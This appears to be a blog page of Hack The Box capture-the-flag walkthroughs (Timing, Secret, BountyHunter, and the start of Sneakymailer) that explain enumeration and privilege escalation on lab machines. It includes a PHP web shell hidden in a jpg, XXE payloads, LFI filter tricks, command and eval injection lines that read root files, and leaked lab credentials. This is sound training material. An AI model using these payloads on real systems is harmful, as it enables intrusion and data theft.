python4004

Timing

2022-06-01T00:00:00+00:00

Hack The Box - Timing

Brief of attacks :

1-LFI

2-source code review (php)

3-Unrestricted File Upload

4-Symbolic link

1-Nmap

nmap -sC -sV  -P 10.10.11.135
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-06 13:06 GMT
Nmap scan report for Timing.htb (10.10.11.135)
Host is up (0.49s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d2:5c:40:d7:c9:fe:ff:a8:83:c3:6e:cd:60:11:d2:eb (RSA)
|   256 18:c9:f7:b9:27:36:a1:16:59:23:35:84:34:31:b3:ad (ECDSA)
|_  256 a2:2d:ee:db:4e:bf:f9:3f:8b:d4:cf:b4:12:d8:20:f2 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Simple WebApp
|_Requested resource was ./login.php
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

let’s explore port 80 ,it is login page.

user flag

i tried sql injection but didn’t work, so let’s explore directories ,i prefere dirsearch tool

[13:38:41] 200 -    0B  - /image.php
[13:38:48] 200 -    5KB - /login.php

image.php

I used WFUZZ to find if there is any parameter and i found img parameter.

wfuzz -w anyworldist -hh 0 http://timing.htb/image.php?FUZZ=../etc/passwd

note :

To find img parameter i want to make application tell that me right, you trying to hack me.

another tools :

param-miner

Arjun

LFI:

very good it’s seem way to attack let’s try some injections (Sql injection -LFI-command injection)

using PHP wrappers

finally i found its LFI, i used php://filter/convert.base64-encode LFI technique to get etc/passwd

you can find ways to detect LFI here

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
aaron:x:1000:1000:aaron:/home/aaron:/bin/bash

notice

aaron:x:1000:1000:aaron:/home/aaron:/bin/bash

let’s readlogin.php after base64 decode

<?php

include "header.php";

function createTimeChannel()
{
    sleep(1);
}

include "db_conn.php";

if (isset($_SESSION['userid'])){
    header('Location: ./index.php');
    die();
}


if (isset($_GET['login'])) {
    $username = $_POST['user'];
    $password = $_POST['password'];

    $statement = $pdo->prepare("SELECT * FROM users WHERE username = :username");
    $result = $statement->execute(array('username' => $username));
    $user = $statement->fetch();

    if ($user !== false) {
        createTimeChannel();
        if (password_verify($password, $user['password'])) {
            $_SESSION['userid'] = $user['id'];
            $_SESSION['role'] = $user['role'];
	    header('Location: ./index.php');
            return;
        }
    }
    $errorMessage = "Invalid username or password entered";


}
?>
<?php
if (isset($errorMessage)) {

    ?>
    <div class="container-fluid">
        <div class="row">
            <div class="col-md-10 col-md-offset-1">
                <div class="alert alert-danger alert-dismissible fade in text-center" role="alert"><strong>

                        <?php echo $errorMessage; ?>

                </div>
            </div>
        </div>
    </div>
    <?php
}
?>
    <link rel="stylesheet" href="./css/login.css">

    <div class="wrapper fadeInDown">
        <div id="formContent">
            <div class="fadeIn first" style="padding: 20px">
                <img src="./images/user-icon.png" width="100" height="100"/>
            </div>

            <form action="?login=true" method="POST">

                <input type="text" id="login" class="fadeIn second" name="user" placeholder="login">

                <input type="text" id="password" class="fadeIn third" name="password" placeholder="password">

                <input type="submit" class="fadeIn fourth" value="Log In">

            </form>


            <!-- todo -->
            <div id="formFooter">
                <a class="underlineHover" href="#">Forgot Password?</a>
            </div>

        </div>
    </div>


<?php
include "footer.php";

i found db_conn.php and many pages ,i got all of them let’s start new chapter.

code review:

login.php:

if (isset($_GET['login'])) {
    $username = $_POST['user'];
    $password = $_POST['password'];

    $statement = $pdo->prepare("SELECT * FROM users WHERE username = :username");
    $result = $statement->execute(array('username' => $username));
    $user = $statement->fetch();

    if ($user !== false) {
        createTimeChannel();
        if (password_verify($password, $user['password'])) {
            $_SESSION['userid'] = $user['id'];
            $_SESSION['role'] = $user['role'];
	    header('Location: ./index.php');
            return;
        }
    }
    $errorMessage = "Invalid username or password entered";


}

From the first look this code seems to have sql injection but after search with my friend Yasser Elsnbary we found that its not sql injection

you can check it from here

Prepared statements are very useful against SQL injections, because parameter values, which are transmitted later using a different protocol, need not be correctly escaped. If the original statement template is not derived from external input, SQL injection cannot occur.

its seem that we have user that have high privilege over other users it may admin user but first we need to login.

i only have a user aaron but i dont have his passowrd and no way to sql_injection

i found this passowrd 4_V3Ry_l0000n9_p422w0rd in db_conn.php but doesn’t work.

so the last solution to find aaron password is to bruteforce we may found it.

using rockyou wordlist it was easy to find ,so our username& password [aaron-aaron]

After logging, i realized that i am in right corner i am user 2 so i need to increase my privilege.

lets open burpsuite

in Edit profile page

From admin_auth_check.php

include_once "auth_check.php";

if (!isset($_SESSION['role']) || $_SESSION['role'] != 1) {
    echo "No permission to access this panel!";
    header('Location: ./index.php');
    die();
}

lets try to manipulate this by setting role=1,so let’s add role parameter and see what will happen.

role parameter changed in json response & admin panel tab appeared.

lets check avatar_uploader.php :

<?php

include_once "header.php";

include_once "admin_auth_check.php";
?>

<script src="js/avatar_uploader.js"></script>

<style>
    .bg {
        padding: 30px;
        /* Full height */
        height: 100%;

        /* Center and scale the image nicely */
        background-position: center;
        background-repeat: no-repeat;
        background-size: cover;
    }
</style>

<div class="bg" id="main">

    <div class="alert alert-success" id="alert-uploaded-success" style="display: none">

    </div>

    <div class="alert alert-danger" id="alert-uploaded-error" style="display: none">

    </div>

    <div class="container bootstrap snippets bootdey" style="margin-bottom: 150px">
        <h1 class="text-primary"><span class="glyphicon glyphicon-user"></span>Upload avatar</h1>
        <hr>


        <form class="form-inline" action="upload.php" method="post" enctype="multipart/form-data">
            <div class="form-group mb-2">
                <input type="file" name="fileToUpload" class="form-control" id="fileToUpload">
            </div>

            <button type="button" onclick="doUpload()" class="btn btn-primary">
                Upload Image
            </button>

        </form>

    </div>
</div>

<?php
include_once "footer.php";
?>

avatar_uploader.js:

$(document).ready(function () {
    document.getElementById("main").style.backgroundImage = "url('/image.php?img=images/background.jpg'"
});

function doUpload() {

    if (document.getElementById("fileToUpload").files.length == 0) {
        document.getElementById("alert-uploaded-error").style.display = "block"
        document.getElementById("alert-uploaded-success").style.display = "none"
        document.getElementById("alert-uploaded-error").textContent = "No file selected!"
    } else {

        let file = document.getElementById("fileToUpload").files[0];  // file from input
        let xmlHttpRequest = new XMLHttpRequest();
        xmlHttpRequest.onreadystatechange = function () {
            if (xmlHttpRequest.readyState == 4 && xmlHttpRequest.status == 200) {


                if (xmlHttpRequest.responseText.includes("Error:")) {
                    document.getElementById("alert-uploaded-error").style.display = "block"
                    document.getElementById("alert-uploaded-success").style.display = "none"
                    document.getElementById("alert-uploaded-error").textContent = xmlHttpRequest.responseText;
                } else {
                    document.getElementById("alert-uploaded-error").style.display = "none"
                    document.getElementById("alert-uploaded-success").textContent = xmlHttpRequest.responseText;
                    document.getElementById("alert-uploaded-success").style.display = "block"
                }

            }
        };
        let formData = new FormData();

        formData.append("fileToUpload", file);
        xmlHttpRequest.open("POST", 'upload.php');
        xmlHttpRequest.send(formData);
    }
}

upload.php:

<?php
#include("admin_auth_check.php");

$upload_dir = "images/uploads/";

if (!file_exists($upload_dir)) {
    mkdir($upload_dir, 0777, true);
}

$file_hash = uniqid();

$file_name = md5('$file_hash' . time()) . '_' . basename($_FILES["fileToUpload"]["name"]);
$target_file = $upload_dir . $file_name;
$error = "";
$imageFileType = strtolower(pathinfo($target_file, PATHINFO_EXTENSION));

if (isset($_POST["submit"])) {
    $check = getimagesize($_FILES["fileToUpload"]["tmp_name"]);
    if ($check === false) {
        $error = "Invalid file";
    }
}

// Check if file already exists
if (file_exists($target_file)) {
    $error = "Sorry, file already exists.";
}

if ($imageFileType != "jpg") {
    $error = "This extension is not allowed.";
}

if (empty($error)) {
    if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) {
        echo "The file has been uploaded.";
    } else {
        echo "Error: There was an error uploading your file.";
    }
} else {
    echo "Error: " . $error;
}
?>

analyzing(upload.php):

1- we can upload jpg file

2- upload_dir = "images/uploads/"

3- this code change the name of photo from this lines

$file_hash = uniqid()
md5('$file_hash' . time()) . '_' . basename($_FILES["fileToUpload"]["name"])

so we need to create simple script that change name like this sequence :

md5(uniqid()+time())+filename

note that

uniqid()-> generates a unique ID based on the microtime (the current time in microseconds).

The generated ID from this function does not guarantee uniqueness of the return value

time()-> function returns the current time in the number of seconds since the Unix Epoch (January 1 1970 00:00:00 GMT).

so the problem that the new name of photo can be detected.

i generate php code that help me to detect new photo name :

<?PHP
#!/usr/bin/php
function uniqid_Test()
{
	$i=0;
	while ($i<80)
	{
		$hash_name=uniqid(); // return time in microsecond in hex format 
		//convert (hash_name ) to decimal value
		$Decimal_value =hexdec($hash_name); 
		$time_seconds=$Decimal_value*0.000001;

		#echo "uniqid (microseconds) = ".$hash_name."\n";

		#echo "(uniqid)-> Decimal value (microseconds)= ".$Decimal_value."\n";

		#echo "(uniqid)-> Decimal value (Seconds) = ".$time_seconds."\n";
		
		// from second to microsecond 
		$converted_id=($time_seconds+$i)/0.000001;
		
		$converted_id_hex=dechex($converted_id);

		echo date("D M j G:i:s T Y") ." -> ". md5($converted_id_hex.time())."\n";

		sleep(1);

		$i=$i+1;
	}

}
function time_Test()
{ 
	while (true)
	{
		echo date("G:i:s")." -> ".md5(uniqid().time())."pts.jpg"."\n";

		sleep(1);
	
	}


}

#uniqid_Test()
#time_Test()

	while (true)
	{
		echo date("G:i:s")." -> ". md5(uniqid().time()) . '_'. "pk.jpg";
		sleep(1);
		echo "\n";

		
	
	}

?>

so lets upload our shell file and run our script.

we need php code inside jpg file

i generate pk.jpg file and put this php code inside it <?php system($_GET[cmd]);?>

http://timing.htb/image.php?img=images/uploads/e8fd9fafa2388864352241933bcac132_pk.jpg&cmd=ls

admin_auth_check.php
auth_check.php
avatar_uploader.php
css
db_conn.php
footer.php
header.php
image.php
images
index.php
js
login.php
logout.php

in /opt directory i found source-files-backup.zip, i downloaded and explore it .

in db_conn.php

<?php
$pdo = new PDO('mysql:host=localhost;dbname=app', 'root', '4_V3Ry_l0000n9_p422w0rd');

i tried to login with 4_V3Ry_l0000n9_p422w0rd via ssh but it doesn’t work,so i should dig more.

i found another password in git logs folders by using git log -p command lets try this password if you dont know how to use git logs check this this

Root flag

by checking sudo

Matching Defaults entries for aaron on timing:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User aaron may run the following commands on timing:
    (ALL) NOPASSWD: /usr/bin/netutils

lets run this binary

its a binary you can download file to machine with root permissions. for trying, i downloaded test python file on the server.

…\Exploit….. In fact, I’ve encountered such an idea before

Symbolic link:

is a file-system object that points to another file system object. The object being pointed to is called the target.

so i will make Symbolic link for ssh key and overwrite authorized_key (Generate SSH Keys use ssh-keygen command).

i will use this binary to upload ssh key to server but it should name the same name of symbol linked to overwrite. `ln -s source_file symbolic_link

Secret

2022-03-22T00:00:00+00:00

Hack The Box - Secret

This is my Writeup and walkthrough for Secret machine from Hack The Box.

description :

1- Source code review (nodejs)

2- JWT token

3- GIT LOGS

4- COREDUMP

This machine not very easy so please read carefully

1-Nmap

nmap -sC -sV -P 10.10.11.120
Starting Nmap 7.92 ( https://nmap.org ) at 2021-11-01 09:33 EET
Nmap scan report for 10.10.11.120
Host is up (0.20s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 97:af:61:44:10:89:b9:53:f0:80:3f:d7:19:b1:e2:9c (RSA)
|   256 95:ed:65:8d:cd:08:2b:55:dd:17:51:31:1e:3e:18:12 (ECDSA)
|_  256 33:7b:c1:71:d3:33:0f:92:4e:83:5a:1f:52:02:93:5e (ED25519)
80/tcp   open  http    nginx 1.18.0 (Ubuntu)
|_http-title: DUMB Docs
|_http-server-header: nginx/1.18.0 (Ubuntu)
3000/tcp open  http    Node.js (Express middleware)

`User access`

i noticed that port 3000 is opened for Node.js okey let’s explore port 80 .

So i downloaded the source code,now let’s dig in it the code so i will stop enum website and explore code first.

in this period my brain focus on way to find RCE.

i found 4 important files in node folder one of them

private.js

router.get('/priv', verifytoken, (req, res) => {
   // res.send(req.user)

    const userinfo = { name: req.user }

    const name = userinfo.name.name;
    
    if (name == 'theadmin'){
        res.json({
            creds:{
                role:"admin", 
                username:"theadmin",
                desc : "welcome back admin,"
            }
        })
    }
    else{
        res.json({
            role: {
                role: "you are normal user",
                desc: userinfo.name.name
            }
        })
    }
})


router.get('/logs', verifytoken, (req, res) => {
    const file = req.query.file;
    const userinfo = { name: req.user }
    const name = userinfo.name.name;
    
    if (name == 'theadmin'){
        const getLogs = `git log --oneline ${file}`;
        exec(getLogs, (err , output) =>{
            if(err){
                res.status(500).send(err);
                return
            }
            res.json(output);
        })
    }
    else{
        res.json({
            role: {
                role: "you are normal user",
                desc: userinfo.name.name
            }
        })
    }
})

let’s explain our code

1- route to `/priv` we found that code only check on the name parameter that `name ==theadmin`.

2- route `/log/` `exec(getLogs, (err , output)` here we got `RCE` that took `${file}` and executed.

so that line was the mistake mistake that the developer made

now let’s make our exploit but first we need to be Authenticated and Authorized.

STEPS To be `authenticated`:

we need to create an account and get jwt token .

so let’s send POST request to register

what we need to create an account ????

    //create a user 
    const user = new User({
        name: req.body.name,
        email: req.body.email,
        password:hashPaswrod
    });

so we need to post (name&email&password) in json format

let’s go to login page to sign in and finally got jwt token

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MjIzYjg5YTI3YzdlYzA0NTliMTkzNTEiLCJuYW1lIjoicHl0aG9uNDA0IiwiZW1haWwiOiJweXRob240MDRAem90ZS5jb20iLCJpYXQiOjE2NDY1MTIxMjV9.CgDdDke1S_4LcMxvGrcPSXphngv3Dtp20ovNTP8Rcx8

Now I am authenticated

STEPS to be `authorized` :

so my mind go on changing the name in jwt token to the admin but i need to find secret token first.

this secret token i found it in git logs folders by using git log -p command

let’s try to access /api/logs that can’t any non authorized user to access by theadmin user jwt token add with our revese shell

`ROOT ACCESS`

now we have an intial access let’s start chapter.

before of all i usually i check sudo writes by sudo -l but now thing is interest ,one of my enumeration our many pentester to use script like linpeas to enum server but let make it last try.

after some time i found a binary file in /opt/ directory with root rights with c code file

let’s check this code

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <dirent.h>
#include <sys/prctl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <linux/limits.h>

void dircount(const char *path, char *summary)
{
    DIR *dir;
    char fullpath[PATH_MAX];
    struct dirent *ent;
    struct stat fstat;

    int tot = 0, regular_files = 0, directories = 0, symlinks = 0;

    if((dir = opendir(path)) == NULL)
    {
        printf("\nUnable to open directory.\n");
        exit(EXIT_FAILURE);
    }
    while ((ent = readdir(dir)) != NULL)
    {
        ++tot;
        strncpy(fullpath, path, PATH_MAX-NAME_MAX-1);
        strcat(fullpath, "/");
        strncat(fullpath, ent->d_name, strlen(ent->d_name));
        if (!lstat(fullpath, &fstat))
        {
            if(S_ISDIR(fstat.st_mode))
            {
                printf("d");
                ++directories;
            }
            else if(S_ISLNK(fstat.st_mode))
            {
                printf("l");
                ++symlinks;
            }
            else if(S_ISREG(fstat.st_mode))
            {
                printf("-");
                ++regular_files;
            }
            else printf("?");
            printf((fstat.st_mode & S_IRUSR) ? "r" : "-");
            printf((fstat.st_mode & S_IWUSR) ? "w" : "-");
            printf((fstat.st_mode & S_IXUSR) ? "x" : "-");
            printf((fstat.st_mode & S_IRGRP) ? "r" : "-");
            printf((fstat.st_mode & S_IWGRP) ? "w" : "-");
            printf((fstat.st_mode & S_IXGRP) ? "x" : "-");
            printf((fstat.st_mode & S_IROTH) ? "r" : "-");
            printf((fstat.st_mode & S_IWOTH) ? "w" : "-");
            printf((fstat.st_mode & S_IXOTH) ? "x" : "-");
        }
        else
        {
            printf("??????????");
        }
        printf ("\t%s\n", ent->d_name);
    }
    closedir(dir);

    snprintf(summary, 4096, "Total entries       = %d\nRegular files       = %d\nDirectories         = %d\nSymbolic links      = %d\n", tot, regular_files, directories, symlinks);
    printf("\n%s", summary);
}


void filecount(const char *path, char *summary)
{
    FILE *file;
    char ch;
    int characters, words, lines;

    file = fopen(path, "r");

    if (file == NULL)
    {
        printf("\nUnable to open file.\n");
        printf("Please check if file exists and you have read privilege.\n");
        exit(EXIT_FAILURE);
    }

    characters = words = lines = 0;
    while ((ch = fgetc(file)) != EOF)
    {
        characters++;
        if (ch == '\n' || ch == '\0')
            lines++;
        if (ch == ' ' || ch == '\t' || ch == '\n' || ch == '\0')
            words++;
    }

    if (characters > 0)
    {
        words++;
        lines++;
    }

    snprintf(summary, 256, "Total characters = %d\nTotal words      = %d\nTotal lines      = %d\n", characters, words, lines);
    printf("\n%s", summary);
}


int main()
{
    char path[100];
    int res;
    struct stat path_s;
    char summary[4096];

    printf("Enter source file/directory name: ");
    scanf("%99s", path);
    getchar();
    stat(path, &path_s);
    if(S_ISDIR(path_s.st_mode))
        dircount(path, summary);
    else
        filecount(path, summary);

    // drop privs to limit file write
    setuid(getuid());
    // Enable coredump generation
    prctl(PR_SET_DUMPABLE, 1);
    printf("Save results a file? [y/N]: ");
    res = getchar();
    if (res == 121 || res == 89) {
        printf("Path: ");
        scanf("%99s", path);
        FILE *fp = fopen(path, "a");
        if (fp != NULL) {
            fputs(summary, fp);
            fclose(fp);
        } else {
            printf("Could not open %s for writing\n", path);
        }
    }

    return 0;
}

`Core Dump`

After analysing:

this code take an file and give us information about

Total characters  
Total words       
Total lines 

there is an interesting line :

// Enable coredump generation
    
 prctl(PR_SET_DUMPABLE, 1);

What is CORE DUMP ??

A core dump consists of the recorded state of the working memory of a computer program at a specific time, generally when the program has terminated abnormally (crashed). Core dumps are often used to assist in diagnosing and debugging errors in computer programs.

A core dump file was found in this directory. The content of core dump files are highly sensitive as they contain the extact contents of the working memory including credentials, user data and so on.

for more details check wiki coredump

for more details about coredump attack this juicy report exploit

what we can do and how exploit occur ????

To generate core dump file we need program to be crashed but how!!

an easy way we need to use linux signals : (if you dont linux signals check this bro linux signals

we will open another tab and use kill -SIGKILL PID command to kill process of count program.

let’s find the ID of process by ps -aux command

before killing process i will make program read /root/root.txt and crash.

now let’s see what is happened in core dump file

using strings command to make file simple

I wish you to be happy to read my report .

……………………………………………………………………….

Bountyhunter

2021-11-18T00:00:00+00:00

Hack The Box - BountyHunter

This is my Writeup and walkthrough for BountyHunter machine from Hack The Box.

`Enumeration`

1-Nmap

nmap -sC -sV -Pn 10.10.11.100
Starting Nmap 7.92 ( https://nmap.org ) at 2021-10-16 22:13 EET
Nmap scan report for 10.10.11.100
Host is up (0.14s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 d4:4c:f5:79:9a:79:a3:b0:f1:66:25:52:c9:53:1f:e1 (RSA)
|   256 a2:1e:67:61:8d:2f:7a:37:a7:ba:3b:51:08:e8:89:a6 (ECDSA)
|_  256 a5:75:16:d9:69:58:50:4a:14:11:7a:42:c1:b6:23:44 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Bounty Hunters
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

`User access`

2- HTTP service

hh don’t worry i will use burp😂😂

okey my methodology to know what is this product do and i got that this platform for bug bounty okay let’s brute force directories to see what is important so i usually use dirsearch for Quick bruteforce

lets check /resources/ directory

by checking bountylog.js it seems a juicy file

now lets analyze this piece of code:

we notic the data is sent to server in data parameter in xml format so it seems xml injection

so lets visit tracker_diRbPr00f314.php

its include i think data that send to server lets open burpsuite to check request

very good this include data about your submission like bug-bounty submission dont forget this is bug-bounty platform 🧐🧐

we will add data parameter to request and send xml injection to try to read /etc/passwd file

<?xml  version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
		<bugreport>
		<title>&xxe;</title>
		<cwe>kajskdajd</cwe>
		<cvss>8787</cvss>
		<reward>557575</reward>
		</bugreport>

i sent this data in data parameter but i didn’t get anything 🧐

okey no problem i made Bounty Report via log_submit.php and it send request to tracker_diRbPr00f314.php page but i found my submition trasnport in data parameter its encoded (url&base64)

thats very good lets encode our xml code and try to inject again

another trick we can do to reverse source code of db.php file by using “php://filter/convert.base64-encode/resource=db.php”

<?xml  version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=db.php"> ]>
		<bugreport>
		<title>&xxe;</title>
		<cwe>kajskdajd</cwe>
		<cvss>8787</cvss>
		<reward>557575</reward>
		</bugreport>

after decoding this string

<?php
// TODO -> Implement login system with the database.
$dbserver = "localhost";
$dbname = "bounty";
$dbusername = "admin";
$dbpassword = "m19RoAU0hP41A1sTsq6K";
$testuser = "test";
?>

we got db user name and password actually i don’t know what should i do with this credential so i decided to take break and watch movie…..

SSH is opened !! —»> lets try,i thought that this password may be for ssh no another thing to do so lets list all users we got it from etc/passwd file and login.

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
development:x:1000:1000:Development:/home/development:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin

acullay we can use tools like hydra to bruteforce user but i make it manually HOW!!

we can check users that have password on machine or Take a look at the uncommon users of Linux, but i recommend it when in small scope why!! not to make firewall if there to detect you ,accully i dont like bruteforce it my last choice

(Note that An x character indicates that encrypted password is stored in /etc/shadow file like `root:x:`)

notice development user

3- SSH

`ROOT access`

first lets check what this user can do so i used sudo -l command

this user can run this /opt/skytrain_inc/ticketValidator.py file so lets see what this file do

#Skytrain Inc Ticket Validation System 0.1
#Do not distribute this file.

def load_file(loc):
    if loc.endswith(".md"):
        return open(loc, 'r')
    else:
        print("Wrong file type.")
        exit()

def evaluate(ticketFile):
    #Evaluates a ticket to check for ireggularities.
    code_line = None
    for i,x in enumerate(ticketFile.readlines()):
        if i == 0:
            if not x.startswith("# Skytrain Inc"):
                return False
            continue
        if i == 1:
            if not x.startswith("## Ticket to "):
                return False
            print(f"Destination: {' '.join(x.strip().split(' ')[3:])}")
            continue

        if x.startswith("__Ticket Code:__"):
            code_line = i+1
            continue

        if code_line and i == code_line:
            if not x.startswith("**"):
                return False
            ticketCode = x.replace("**", "").split("+")[0]
            if int(ticketCode) % 7 == 4:
                validationNumber = eval(x.replace("**", ""))
                if validationNumber > 100:
                    return True
                else:
                    return False
    return False

def main():
    fileName = input("Please enter the path to the ticket file.\n")
    ticket = load_file(fileName)
    #DEBUG print(ticket)
    result = evaluate(ticket)
    if (result):
        print("Valid ticket.")
    else:
        print("Invalid ticket.")
    ticket.close

main()

Okey after analysis this file this file check about ticket is valid or not

important notes about this python code :

1-ticket file should have md extention.

2- eval()–» way to excute malicious code but first we should pass filters.

on exploring this server i found folder that have sample of invalid tickets in /opt/skytrain_inc/

so i downloaded this code and created test.md file to check the valid format of ticket.

valid format steps

1-first line starts with # Skytrain Inc.

2-second line starts with## Ticket to.

3-third line starts with __Ticket Code:__

4-Line 29 it checks if the fourth line is in or not ,if the line exist should starts with ** and the script removes the **

so in the forth line we can excute code so upload sample of test.md in valid format on the server and tried to run the code

and try to read /root/root.txt

# Skytrain Inc
## Ticket to
__Ticket Code:__
**180+ 30 == 210 and __import__('os').system('cat /root/root.txt') 

Finally PWN!!

Sneakymailer

2021-03-16T00:00:00+00:00

Hack The Box - Sneakymailer

This is my writeup and walkthrough for sneakymailer from Hack The Box.

a medium linux machine.

`Enumeration`

1-Nmap

nmap -sC -sV -O 10.10.10.197
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-18 12:38 EET
Nmap scan report for sneakycorp.htb (10.10.10.197)
Host is up (0.34s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE  VERSION
21/tcp   open  ftp      vsftpd 3.0.3
22/tcp   open  ssh      OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 57:c9:00:35:36:56:e6:6f:f6:de:86:40:b2:ee:3e:fd (RSA)
|   256 d8:21:23:28:1d:b8:30:46:e2:67:2d:59:65:f0:0a:05 (ECDSA)
|_  256 5e:4f:23:4e:d4:90:8e:e9:5e:89:74:b3:19:0c:fc:1a (ED25519)
25/tcp   open  smtp     Postfix smtpd
|_smtp-commands: debian, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING, 
80/tcp   open  http     nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Employee - Dashboard
143/tcp  open  imap     Courier Imapd (released 2018)
|_imap-capabilities: STARTTLS ACL OK UIDPLUS ACL2=UNION IDLE IMAP4rev1 CHILDREN QUOTA THREAD=ORDEREDSUBJECT THREAD=REFERENCES completed ENABLE CAPABILITY UTF8=ACCEPTA0001 NAMESPACE SORT
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Not valid before: 2020-05-14T17:14:21
|_Not valid after:  2021-05-14T17:14:21
|_ssl-date: TLS randomness does not represent time
993/tcp  open  ssl/imap Courier Imapd (released 2018)
